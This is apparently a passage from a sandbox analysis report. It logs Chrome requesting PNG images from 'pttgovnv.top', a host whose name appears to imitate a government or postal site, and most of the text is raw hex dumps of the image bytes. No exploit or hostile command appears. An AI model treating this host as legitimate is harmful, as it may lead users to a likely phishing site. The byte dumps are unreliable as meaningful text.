17 13 32 c5 7c 3c 04 b6 da 91 fb 9b 8b a4 48 11 cd 27 ac cb 4b 9c 78 8f d1 1d af 20 f9 f1 7b 8e 3b 3d 19 b8 ba 15 fe 6d
          Data Ascii: cfMjT^*Qwtl9xhsOR;%CcG,C" 4M!InL,'^Z|-+Cswfx3cc8Yg*N;@~~+Oi&P+*$]Gt?FePQS^j!0+H2|<H'Kx {;=m
          2024-09-01 22:25:27 UTC1369INData Raw: ab ae 7f 33 06 bc b3 fb fe a8 07 5f e0 6d f5 b3 2f b3 e3 d2 56 14 99 a6 db c4 0f 9f 6b 9e 6b 68 df ce 7b 13 86 61 89 63 98 39 e3 89 fa 96 cb 4d 50 6e 92 cd 7c 15 14 8d 7b d3 22 70 b3 3d 17 6a 6c 9d 03 c9 b7 d7 4b d1 9a 2d 86 36 db 90 6e af 95 82 41 55 a5 94 42 95 02 27 04 84 aa 3e b3 7b 3a e0 08 8d 4b 9c 8c 24 09 91 23 c1 a3 93 a5 d9 39 2f df 0f 49 9b 69 20 24 a3 82 c9 c7 3b e6 e5 3d 58 2f a8 2a 4a a5 6a 29 54 6a 5a 9c 7e f8 45 d8 6e fa 13 9c c1 04 ac 36 5b b1 c8 09 c2 d1 28 cc ef 5e 2f c7 22 ce 16 e9 77 ad 87 63 d3 f2 59 8f c6 01 28 fa 91 a3 8f 50 e7 b7 1b dc b4 b3 a1 ed 72 de ab 30 0c 4b 1c c3 cc 3a 8f d7 b5 b4 0b 81 bb dd a0 cd c6 00 dd 01 09 73 37 17 aa 69 5d 23 1c 97 9e 3e 6b d1 b8 90 10 08 f7 a7 df 2a 0b 14 a8 ff 9b d3 e7 81 d9 61 83 dd 6c 41 e4 fe
          Data Ascii: 3_m/Vkkh{ac9MPn|{"p=jlK-6nAUB'>{:K$#9/Ii $;=X/*Jj)TjZ~En6[(^/"wcY(Pr0K:s7i]#>k*alA
          2024-09-01 22:25:27 UTC1369INData Raw: 18 1a 7f 1e a7 5d ae 1b f3 f5 1d 19 b5 29 c8 c4 e5 9c 3a 35 97 7a f9 33 3b 1b da ee 3d b9 af f3 61 de 13 31 4c 79 94 5c 05 a4 5f 18 a6 12 51 27 b6 df 2d 4e 6d d4 cb ca ac 46 de cc fa 86 be f3 30 a5 96 6c ff 71 eb 65 08 24 c2 13 fe 66 77 b9 10 f9 fc bd 30 04 32 b0 5c 50 0d 43 bd 07 96 a6 6a d8 d6 b5 c1 58 e5 86 b1 d6 8f e8 d0 30 c2 23 a3 f0 bb 3d 18 fa c4 9d 68 98 c5 29 c8 a3 35 06 98 07 33 33 36 a6 8b 29 a6 ef 44 0b 3c 7f 77 25 22 a1 31 d9 cf 8f d2 b7 34 33 04 b5 28 c9 c5 53 50 62 49 c4 f6 1c 40 aa 3b 80 96 4f 5d 09 7b 7d ad 1c a7 17 0d 0c a3 e7 95 d7 f3 0e e7 f7 22 f6 be 5f a0 d1 34 7f bf e9 69 9d 4e 8b 63 11 a5 75 a9 29 8b 3c cf 5f ef 4c 23 b7 e5 94 be ce 51 fe b6 19 86 25 8e 61 a6 0d a5 51 85 a8 7d 46 6b e6 ab 97 37 8b ee f2 5c 43 4d 78 2d 77 be 17 81
          Data Ascii: ]):5z3;=a1Ly\_Q'-NmF0lqe$fw02\PCjX0#=h)5336)D<w%"143(SPbI@;O]{}"_4iNcu)<_L#Q%aQ}Fk7\CMx-w
          2024-09-01 22:25:27 UTC1369INData Raw: 02 97 cd 64 65 24 45 8e 85 13 62 47 02 47 7d c2 08 4a ab 3a bc 6e 38 7d 1e d8 eb aa 91 a8 5a 7a 9b 39 1d ec dd 27 af 93 97 ed 27 ad 91 cd 8e 97 12 a3 5e 05 de 4b ce 2c 12 38 2a 62 58 76 ca 16 29 70 23 bd fd 30 5a 2c 68 3d ed 24 ac d9 76 16 7c f5 b5 70 f9 bc c8 ee 78 0d d9 cf dc 8d e6 db e7 57 e0 e4 c1 a9 a4 a1 b6 d6 68 5b 9d 5b d5 c7 7b 2d 86 61 89 63 18 89 38 48 6c 17 a7 36 4a a3 1a 30 3e 05 90 41 3b 98 cc c3 ac 0c 7a 99 73 dc bc 1b d9 4f de 09 c7 cb dd f9 48 9b 90 37 2d 8a 6e b5 db 60 32 9b e5 65 aa 44 a4 82 06 12 3d 9a 5e 89 44 af ea c3 e7 2e b9 49 e8 63 24 71 6b da e4 32 32 78 1c 88 2c b1 8c 43 e4 ca e5 88 ea fa c5 91 c0 ad 38 e7 74 99 7a 4f aa 53 a1 f5 be f8 4a 5e fa ed 0e 34 6d 3d 11 91 47 5f 40 dd 6d 07 e6 5d de 34 14 75 db 33 94 6e 8b 90 db 29 f7
          Data Ascii: de$EbGG}J:n8}Zz9''^K,8*bXv)p#0Z,h=$v|pxWh[[{-ac8Hl6J0>A;zsOH7-n`2eD=^D.Ic$qk22x,C8tzOSJ^4m=G_@m]4u3n)
          2024-09-01 22:25:27 UTC1369INData Raw: 99 db 9e 88 a1 f5 4f a1 69 cb 9b 9e aa 2e b1 ac 6e 7e 10 36 9b 0d 49 64 2b 36 9d 5a d8 0e 74 db ac 6e ac dc 65 5c a9 ca b0 c4 31 cc 92 58 e9 a7 1e 0b 57 a9 43 ff 0d 2b 9a e0 30 59 11 90 02 77 ec 12 46 32 b7 58 25 8e 7a e1 59 5a ea f3 02 97 29 56 36 f3 a6 15 4b 6e fa ad 69 8b dc 9e 24 72 b7 3c 88 4c 34 81 ec e9 ce 8a 7e af a5 d1 b8 42 db 11 1e 1b c7 b0 c4 31 cc e2 66 bc 2f dc c2 8a c2 91 9c e4 fa 47 30 f6 f9 bb 8f 4b e0 16 3b c9 5a 23 72 0e ab 14 b8 5c 89 b0 a5 4c 86 25 37 fd d6 51 89 dc 8b 49 18 7e fa 07 18 07 92 95 7f e0 9a bc 52 b5 9d bf 49 86 25 8e 61 16 ed 0a af 5c 4b 9e a6 60 61 45 e1 6c d4 0f ee df 77 2e 4a 81 1b f2 29 33 d7 fe e3 44 8f 1c 37 28 23 71 d9 5c d1 b8 b8 0c a5 0a fd 33 b3 cb 3b 74 82 65 51 8e 2b f4 0b 91 6b 3a 54 f9 a2 3b c5 d8 b8 6b 79
          Data Ascii: Oi.n~6Id+6Ztne\1XWC+0YwF2X%zYZ)V6Kni$r<L4~B1f/G0K;Z#r\L%7QI~RI%a\K`aElw.J)3D7(#q\3;teQ+k:T;ky
          2024-09-01 22:25:27 UTC1369INData Raw: 3e e3 fc 75 ad a3 19 1d 52 ff f2 7b 38 fd 5e 29 44 e1 6c 12 ae af 5e 8a c0 9b 6b 65 94 68 a6 49 74 f4 ca 34 a8 af a9 4e 5e 1f 19 1e 86 ef 3b 6f 9d f6 6b 91 24 5b e5 4c 0d e3 02 57 2e 5a 46 b7 19 85 90 4d 3b 9a 74 ba 03 8e 0b 4e 82 c1 60 94 d5 ad 72 7d 9a a5 20 9c 1c fb 76 55 23 96 fd d3 b5 68 7c c3 c9 e8 d9 f3 aa 10 46 13 a2 3f f9 03 7c 86 f9 db 55 7b 0f a4 91 7c ad 1b 55 cb 1a 31 36 32 0a e3 5b 4e 96 a9 f6 ce 8d e6 09 45 22 f4 3d 0c 5c e4 47 cb f7 af 83 62 b5 22 3c 14 90 cb 4d 09 c7 e0 9c 45 09 2d 9d 8a 4b dd be b9 c0 81 61 89 63 98 85 0c cd d0 40 05 0d 06 5d 41 83 56 8d 3a 5b 6d 45 2c 8f 8f c1 68 32 c2 e6 72 c8 54 0f 8d a3 32 bd f5 64 c4 af 5f 57 24 72 74 b9 f7 ad 35 a8 be ed 83 a8 be e0 54 29 1e c3 3d fd b0 bb 9c c8 3e b4 6f de 1b 0f fb 9e 8b c1 b8 73
          Data Ascii: >uR{8^)Dl^kehIt4N^;ok$[LW.ZFM;tN`r} vU#h|F?|U{|U162[NE"=\Gb"<ME-Kac@]AV:[mE,h2rT2d_W$rt5T)=>os


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          102192.168.2.449847104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC361OUTGET /help/layout/images/49.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC722INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: image/png
          Content-Length: 10988
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"2aec-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36236
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJwov4W3n4kqdeWrSfURIrTZ%2Bu16F6CA7Wr5J0mxSvLmXQeD0zqZQlLXQ1j09y%2FU8iSzhv24AP2IPtzFGcEWP9hkRT7Oocc6QRR9Q1x5kmqc2xHNwWKguniJd0nN0rQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad255bd1c43b-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC647INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2a 79 49 44 41 54 78 da ec dd 4f 52 db e8 1a 2f 60 f5 ad 3b 27 3b 80 33 e8 31 9c 15 e0 ac 20 ee 71 aa 1a 67 05 a1 57 80 59 41 c8 0a 62 ba 2a e3 43 56 80 59 41 93 71 06 c7 ac e0 86 15 e4 ea 6d 3e 4e bb 69 4b 96 6c c9 96 ec e7 a9 72 25 85 8d 2c 7d 92 d1 cf df df 9f 7e fc f8 91 01 00 d0 2f ff 47 11 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<*yIDATxOR/`;';31 qgWYAb*CVYAqm>NiKlr%,}~/GqqqBBB qqq
          2024-09-01 22:25:27 UTC1369INData Raw: 17 00 20 c4 f5 90 75 56 01 00 21 ae 87 62 9d d5 a1 62 00 00 84 b8 1d 11 35 74 fa cd 01 00 42 5c ff c4 9a ab 57 9a 5b 01 00 21 ae 7f a2 b9 55 bf 39 00 40 88 13 e4 00 00 21 0e 41 0e 00 10 e2 10 e4 00 00 21 4e 90 03 00 84 38 04 39 00 40 88 43 90 03 00 84 b8 bd 0e 72 47 8a 02 00 84 38 fa 17 e4 6e f2 20 f7 4a 51 00 80 10 47 bf 1c 67 4f 35 72 82 1c 00 08 71 08 72 00 80 10 87 20 07 00 08 71 08 72 00 80 10 27 c8 01 00 42 1c 9d 09 72 13 c5 00 00 42 1c fd a3 26 0e 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 6e 7f 99 0c 18 00 84 38 fa e9 24 0f 72 93 8e 06 cc 91 d3 03 00 42 1c c5 ce ba 16 e4 d2 fe 08 71 00 20 c4 51 21 c8 8d 3b 14 e0 ce 9c 12 00 10 e2 a8 e6 62 db 4d 98 f9 fb 9f 0b 70 00 20 c4 51 df a7 6d 05 b9 f4 be 1f 9c 02 00 10 e2
          Data Ascii: uV!bb5tB\W[!U9@!A!N89@CrG8n JQGgO5rqr qr'BrB&888!!!!n8$rBq Q!;bMp Qm
          2024-09-01 22:25:27 UTC1369INData Raw: 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 41 2d df 15 01 00 08 71 f4 cb d7 fc 31 52 0c 00 20 c4 d1 af 00 37 f8 76 7b a9 26 0e 00 2a fa bf 8a 00 01 0e e0 c9 db b7 bf 8e b2 7f b6 0a 4c 3e 7f fe 7d a2 74 d6 2e db 93 fc 9f ab 17 3f be cf cb f6 5c e9 08 71 f4 cf 5d fe 18 0a 70 40 87 1c e5 8f d3 17 3f 9b 2a 96 46 bc 5a 50 b6 08 71 f4 d0 75 1e de 46 8a 01 00 56 a3 4f 1c 02 1c 00 08 71 20 c0 01 c0 26 68 4e 45 80 03 f8 cb b4 e2 cf a8 6f 96 3f 2e 17 fc 0c 21 8e 8e fb 98 07 38 23 90 80 4e fb fc f9 f7 a9 d0 d6 5a d9 46 60 1b 2b 09 21 8e 7e 79 97 07 b8 49 5b 1b ff f9 f5 c5 a8 cd ed c3 36 bc 7d fb eb 20 7b 1a 29 79 b4 e0 e9 b8 19 ce 52 e0 e8 fa 71 c4 88 c4 93 f4 78 b5 e0 25 f7 e9 58 ee 9d 75 10 e2 d8 af 00 17 df ea e2 66 27 c4 3d dd 30 7f b4 fc 4d fa a7
          Data Ascii: A-q1R 7v{&*L>}t.?\q]p@?*FZPquFVOq &hNEo?.!8#NZF`+!~yI[6} {)yRqx%Xuf'=0M
          2024-09-01 22:25:27 UTC1369INData Raw: 40 e7 0d 1d f6 55 fa 72 f2 32 bc c6 94 23 37 2b 34 71 95 85 aa 55 9b cb 66 25 cf 9d 6c 29 60 af da cd 61 ba 27 81 ad e8 5c 2d fc 79 9a f8 77 e5 73 91 5f a7 55 3f 0f 47 15 3f c7 65 a3 53 b7 f5 a5 4e 88 83 06 82 dc 4d 0a 6a 45 37 d8 f8 f9 9b fc 35 51 63 37 49 81 ee fe 45 80 2b 1b c8 c0 f6 94 d5 a4 1e 66 eb 4d fc 5b e7 8f 7e dc 3c 8a 46 a2 ae 3a 90 61 a1 d8 4e 1a 85 f7 72 4e b7 36 a6 be 58 f5 c6 37 5b f1 9c b5 a6 8d fe 5b d1 7c be e3 4b 3a 1d 94 fc 7c 53 c1 f6 ac e4 b3 55 d5 43 9b cb d4 f1 17 cd a9 b4 65 94 15 f7 6d 99 ff c3 14 73 43 45 73 eb 7d d4 e0 45 73 6b 85 81 0c 2f 43 a3 3f 16 fb a7 ec 26 33 6a ba 6f 5e aa 21 5c d4 a4 75 de 72 9f b3 aa fb 37 db 93 f3 ae b3 7c 3f 9c 2b 02 21 8e 1e 8b 66 d5 ac 5e 0d c5 f3 22 de ff 2f 7b 6a 86 31 90 81 d2 6f fa 25 cf 8d
          Data Ascii: @Ur2#7+4qUf%l)`a'\-yws_U?G?eSNMjE75Qc7IE+fM[~<F:aNrN6X7[[|K:|SUCemsCEs}Esk/C?&3jo^!\ur7|?+!f^"/{j1o%
          2024-09-01 22:25:27 UTC1369INData Raw: db bf ac f1 cf c1 92 c1 3a 5d f9 22 17 d7 51 51 7f 48 83 1c 84 38 76 51 0c 3a c8 ba 33 5c 3e 6e 20 31 7f 5d 8c 6e bd 72 76 56 0a 30 47 5d bb d9 54 08 47 95 fb 9c 55 74 b5 ea 4d 3c dd 08 7f 69 38 04 bc 4b 03 2f ca de f7 bc 62 e8 aa 1b 3c 9a dc 66 94 c9 a0 c9 66 c0 ec a9 43 fe a0 c9 a6 be b4 ad 41 56 be 14 dc 2a 06 4d 9f a3 16 94 85 e1 89 bf 92 42 1c bb 15 e0 e2 8f fc 59 47 76 e7 31 7d 8b fc 2d 7f fc eb db ed a5 39 8e 56 bc 81 e5 8f 68 16 bb cc 3a 54 2b 97 c2 d1 6f 25 2f 79 df d4 40 87 92 29 47 aa fe 7e d4 62 45 19 ae 3b 97 62 84 e9 d7 cb 02 dc 8b d0 f5 4b 93 e1 a3 c1 6d 46 78 39 6a 38 c0 c5 36 4f 1a de e6 f3 71 df a7 73 78 dd f0 67 ab f1 73 d4 c2 17 b9 8f 25 5f 96 0c 72 68 99 3e 71 6c 2a c0 9d 64 2d ac 67 59 53 dc 24 e3 e6 7e b3 e7 fd e1 8a c2 c2 ca b5 13
          Data Ascii: :]"QQH8vQ:3\>n 1]nrvV0G]TGUtM<i8K/b<ffCAV*MBYGv1}-9Vh:T+o%/y@)G~bE;bKmFx9j86Oqsxgs%_rh>ql*d-gYS$~
          2024-09-01 22:25:27 UTC1369INData Raw: 39 cc 5f 1f e7 7b 59 cd fe a8 ee 3c 78 e9 bc 8e 97 bc ac f4 33 04 42 1c 2c 0f 84 37 79 40 8b 01 0e 07 cb c2 5e fe ba 93 86 03 64 13 37 b2 59 7e c3 88 ff 9e 2e 78 fa 34 26 3e 5d 75 22 d6 74 43 3c 2d ba b1 15 04 ca 71 ba 59 1f 74 a4 88 5e 95 1c c3 3a af 5d 37 78 37 59 4e a7 1b 2a cb a3 ba ef 95 c2 db 55 d6 d0 3c 8f 2d ec e3 49 85 d7 0f b3 e2 d1 ec 59 c9 e7 63 d9 76 3b f7 a5 90 fe d0 9c 0a f5 fe 98 c6 cd f6 a6 a3 fb 5f 76 83 59 a7 06 a9 e8 77 ef 5e 06 c3 fc 66 1d af fd 6f ba 59 1f b8 a4 0a 43 4d 94 d3 fd 3e 94 53 aa d9 9c 6d 30 c0 b5 65 b4 c2 ef 0c 5d ed 08 71 d0 9d 10 17 8e d3 88 d6 4e c9 03 55 84 cb 87 06 6f 40 cf 37 e0 e3 2a a1 31 7f ed 24 fb fb 52 66 2c 2e d3 e7 72 da 97 90 7b b3 23 c7 7a 9c 6a 4f ab 9e e7 61 e6 8b 0c 42 1c 6c cc 7d 8d d7 be cf 83 dc a0
          Data Ascii: 9_{Y<x3B,7y@^d7Y~.x4&>]u"tC<-qYt^:]7x7YN*U<-IYcv;_vYw^foYCM>Sm0e]qNUo@7*1$Rf,.r{#zjOaBl}
          2024-09-01 22:25:27 UTC1369INData Raw: ac 56 2a 8d 7e bd 2b 78 fa 74 dd d5 08 b6 a8 28 74 8d 97 2c ec be 6a 39 4d 7c 12 37 fe 45 6b 15 0b 9b 54 33 4d a9 6c 89 81 0d d0 ce 14 05 c7 d1 cf ee db ed 65 67 be 89 a7 ce d9 71 63 39 ab 11 fa aa 96 df 6d c1 73 17 a9 53 7a 84 94 fb 96 9a 2a db ba 59 bf 59 f0 f3 18 c4 f1 47 7e 4c bf 65 8b 57 b0 58 b5 9c ce d2 14 2f 7d 2b a7 a5 1a 9a 90 77 54 76 dd 6e 70 39 ae a2 51 aa 55 03 1f 08 71 d0 94 54 0b 77 d6 d2 e6 07 1d fc 43 3e ae 78 bc 8f a9 1f 5d 95 70 38 2d 18 b9 f7 ec 34 3d b2 3a 6b 47 e6 db fd 69 8b 81 77 92 6a 11 8b 56 af f8 10 8f fc 35 d1 cf 70 b6 64 5b 83 b9 72 ba 2e 29 ff de 95 53 45 b7 2d 6f ff cb 86 bf 08 5d 57 f8 0c 69 4a 65 23 34 a7 76 8f 0f fe 66 b5 39 97 59 e7 e6 85 5a d2 ac 37 6f 52 73 d3 a3 ec 69 4d cb 5d 32 aa f0 9a c3 b9 f0 55 f4 98 77 be 83
          Data Ascii: V*~+xt(t,j9M|7EkT3Mlegqc9msSz*YYG~LeWX/}+wTvnp9QUqTwC>x]p8-4=:kGiwjV5pd[r.)SE-o]WiJe#4vf9YZ7oRsiM]2Uw
          2024-09-01 22:25:27 UTC1369INData Raw: 6b 43 7e 73 8f 7d 3f 2e 78 fa 6b 1e e0 46 3d 38 8c f8 8c cc 4a 9e 8f 1a ab a8 69 3b 5d 12 88 fa f6 a5 69 58 23 7c aa 85 03 21 8e 2d 18 0b 71 9d 76 97 d6 bc ed 63 80 3b 2f b9 b6 62 74 f4 a0 2f 21 ba 4a 73 6f 6a 32 bd 29 08 73 d1 3c 79 d4 b3 11 92 7f 36 a9 56 ec ab 28 c4 c1 8e d0 9c da 23 a9 6f dc 47 25 d1 e9 90 dd c7 00 17 01 ed 43 c1 d3 31 72 73 58 32 6a b3 97 d2 f1 94 85 99 a3 8e 1f c2 c3 82 9f 8d 2a 9c 6b 4d a9 20 c4 b1 e5 a0 f0 a8 18 3a 27 6a e1 a6 3d 0c 70 d1 bc 58 36 10 e3 7c c7 46 a2 be 0c 72 5f 7b ba fb 8b ce 59 95 1a b6 61 41 50 bf f3 11 06 21 8e 96 a5 a5 b8 ce 95 44 27 c3 75 df 02 5c 34 29 4e b2 e2 9a 99 cb 3d 18 c8 d0 57 8b 42 5c 95 51 aa c3 8a db 02 84 38 5a 0a 72 13 df 9c 3b a5 97 b5 70 29 c0 15 0d 64 b8 ae bb 12 41 0f 43 ec 51 c9 f1 f7 41 ad
          Data Ascii: kC~s}?.xkF=8Ji;]iX#|!-qvc;/bt/!Jsoj2)s<y6V(#oG%C1rsX2j*kM :'j=pX6|Fr_{YaAP!D'u\4)N=WB\Q8Zr;p)dACQA
          2024-09-01 22:25:27 UTC758INData Raw: f6 54 1b 55 27 c4 3c 64 7f 2d f3 35 6e e1 b0 ca ae df 2f 4d d7 74 a5 26 f8 a3 ec 69 be c1 87 9a 9f b7 28 bb d7 f9 36 d4 c0 c1 8a 0c 6c d8 df 20 37 fd f9 f5 45 d4 9c c4 8d e4 fd 9e 17 47 04 8e d1 0e f6 7f 7b bd c6 cd 39 9a 4d 67 25 2f f9 5e f2 bb d3 2c 8d e4 4c b5 3c 47 e9 b1 68 1b 11 18 ef 57 b8 89 47 88 5a 34 0a b2 6e 6d 4e 5c ff 37 75 8f 71 2e 04 8e d2 71 9e a4 63 2c 1a 8d 1b e5 31 5b 61 79 af 49 b6 78 54 ec ac 28 80 e7 fb 52 74 de 8b de fb be e0 5a f9 5e f1 5a 79 1e f1 3b 4e cd d0 f1 18 94 bc d7 4c ad 1b 34 e3 a7 1f 3f 7e 28 85 3d 97 c2 5c 7c a3 3e ad 12 0c 52 93 6c d1 b6 e2 8f f9 45 4f 0e 3d 6a 03 c6 69 b9 32 00 e8 15 cd a9 44 ad dc 7d 8c c4 cc ff fb 4b b6 3f 4d ac 7f f6 c3 11 e0 00 e8 2b cd a9 cc 87 b9 3f e7 76 fa f9 f5 c5 28 7b 6a 1e 39 dc c1 c3 8c
          Data Ascii: TU'<d-5n/Mt&i(6l 7EG{9Mg%/^,L<GhWGZ4nmN\7uq.qc,1[ayIxT(RtZ^Zy;NL4?~(=\|>RlEO=ji2D}K?M+?v({j9


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          103192.168.2.449848104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC361OUTGET /help/layout/images/47.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC724INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: image/png
          Content-Length: 22730
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"58ca-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36236
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXG62ccMoRfK70Hx6TBTNx4ffiKP1nz2pxMeo5YyGXX0dMI%2BnsWzY0EmsRvI1mSZu9IK5IKrhoxvzGOfQ6%2Fa0%2BcUzxLhkYz4qLHFcy1cTqoIP7Q11QzHqKZPG9sr4jQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad255fe6438b-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC645INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 58 57 49 44 41 54 78 da ec bd 0b 78 1b e7 79 e7 fb cd 05 03 0c 40 12 24 05 89 ba d1 a4 dd 24 72 1c db a4 e2 c6 71 62 a5 62 da 26 f5 ba 49 c4 34 49 63 e7 62 d3 9b 38 69 9b 36 96 db ee 49 da 93 1e d1 bb 39 db ee d3 9e b5 ec ee d3 cd 73 ec 56 b4 93 ad 9d cb 49 a4 b4 4d d5 34 5d 53 b1 95 5a be 89 f4 55 92 25 8b 14 75 a3 08 e2 42 02 98 01 e6 f2 9d ef 1b 0e 48 10 04 49 90 04 71 21 ff bf 47 a3 01 07 83 99 c1 cc 60 e6 37 ef fb 5d 04 4a 29 01 00 00 00 00 00 b5 85 88 5d 00 00 00 00 00 00 89
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<XWIDATxxy@$$rqbb&I4Icb8i6I9sVIM4]SZU%uBHIq!G`7]J)]
          2024-09-01 22:25:27 UTC1369INData Raw: 00 00 00 00 89 03 00 00 00 00 80 c4 01 00 00 00 00 00 48 1c 00 00 00 00 00 80 c4 01 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 12 07 00 00 00 00 00 20 71 00 00 00 00 00 00 12 07 00 00 00 00 00 89 03 00 00 00 00 00 90 38 00 00 00 00 00 00 89 03 00 00 00 00 80 c4 01 00 00 00 00 00 48 1c 00 00 00 00 00 80 c4 01 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 12 07 00 00 00 00 00 20 71 00 00 00 00 00 00 12 07 00 00 00 00 00 89 03 00 00 00 00 00 90 38 00 00 00 00 00 00 89 03 00 00 00 00 80 c4 01 00 00 00 00 00 48 1c 00 00 00 00 00 80 c4 01 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 40 e2 00 00 00 00 00 00 24 0e 00 00 00 00 00 12 07 00
          Data Ascii: H@$@$ q8H@$@$ q8H@$@$
          2024-09-01 22:25:27 UTC1369INData Raw: 53 6c 39 eb 3a f6 dd 1b fe af 54 4a fc 52 22 29 fa 6d 9b 34 e5 bf ef f7 d1 38 1b 82 49 8d 10 2e 71 7c 9b 36 04 05 55 ca 4b d8 33 c1 72 84 4e 92 68 38 9d 11 3e fe a1 2f 0d 0c 2f 53 28 3b 7d 75 8d 8f 4a b2 7c 13 3b 85 b5 97 9e 4f f2 ef a9 85 1a ed e9 4a 1c 6c 5b c2 17 c3 42 c8 30 c9 20 fb b3 8b 49 5c 0c 67 0d e0 dc 79 e7 1d 3c 52 bb e2 22 06 4f 3c f1 64 3f f6 26 00 a0 52 20 9d 5a c3 30 21 eb 73 d3 86 0f 26 13 12 61 92 15 6e 68 30 43 1e c5 56 cd 8c ae 4d 26 14 de ec 47 6b bd 9f 44 b6 86 e8 d7 d8 eb af b1 f9 b9 d0 f4 bb c3 00 5b c6 50 31 eb 9a 98 14 4f b1 e5 7f 6e be f7 7d 5e fa a7 6c f4 a1 9c 49 6a 52 a3 7f d6 10 10 9e c9 9d 2f 63 08 6c 70 44 93 8b 1f 8f 9e 15 25 71 6e 19 c0 ae 9c 21 a8 27 62 c4 eb af d3 64 c5 a7 3a e5 e2 6c 2b c3 d7 6b 59 24 7e fe 8a 10 4c
          Data Ascii: Sl9:TJR")m48I.q|6UK3rNh8>//S(;}uJ|;OJl[B0 I\gy<R"O<d?&R Z0!s&anh0CVM&GkD[P1On}^lIjR/clpD%qn!'bd:l+kY$~L
          2024-09-01 22:25:27 UTC1369INData Raw: 3b 92 49 a7 ab af 36 57 e2 fa 71 4a 03 00 00 80 c4 ad 0f 9c b6 da 9a 1a 25 12 8d 59 6d f9 65 e3 4e 1e be b6 9d 4c 35 9d d1 95 4c 49 d7 8f 8d 4b f1 df b8 f7 e5 2f 60 b7 ad 2e 43 3f bf f9 46 42 ec c7 33 ba 76 98 da d6 09 3e 69 c7 6d 27 f2 05 8d 4b 37 49 24 ec 6c f4 1a e9 54 00 00 00 90 b8 f5 c0 f9 67 77 4d a7 df 64 59 70 c6 92 44 be c1 c4 ad db 15 82 dd d9 f7 c3 11 cf e8 d9 73 62 44 4b 0b ef c7 9e 5b 7d da 7f e5 b9 97 d9 f1 d9 2f 2b de bf 31 d2 7a c6 d0 b5 20 3b 2e fc 2d 1e 75 1b 12 25 39 ac d6 37 b6 39 12 97 b4 15 f7 63 5d d8 73 35 0d 2f 2b 7a 04 bb 01 00 50 cb 08 94 52 ec 85 55 80 49 00 17 33 2e 6e ed 7c 10 04 e1 23 be ba e0 4d 4c 08 c8 d9 b3 c6 f0 89 53 e9 b6 6d 9b ed f8 2f b5 65 a6 1b e3 8d c6 e5 f0 9b 6f 